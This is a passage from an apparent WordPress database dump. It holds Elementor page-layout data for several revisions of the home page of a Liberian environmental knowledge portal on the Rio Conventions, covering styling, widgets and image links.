\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5786,513,'_elementor_version','2.7.5'),(5787,513,'_elementor_template_type','wp-page'),(5789,514,'_wp_page_template','default'),(5790,514,'_elementor_edit_mode','builder'),(5791,514,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5792,514,'_elementor_version','2.7.5'),(5793,514,'_elementor_template_type','wp-page'),(5796,515,'_wp_page_template','default'),(5797,515,'_elementor_edit_mode','builder'),(5798,515,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5799,515,'_elementor_version','2.7.5'),(5800,515,'_elementor_template_type','wp-page'),(5804,516,'_wp_page_template','default'),(5805,516,'_elementor_edit_mode','builder'),(5806,516,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\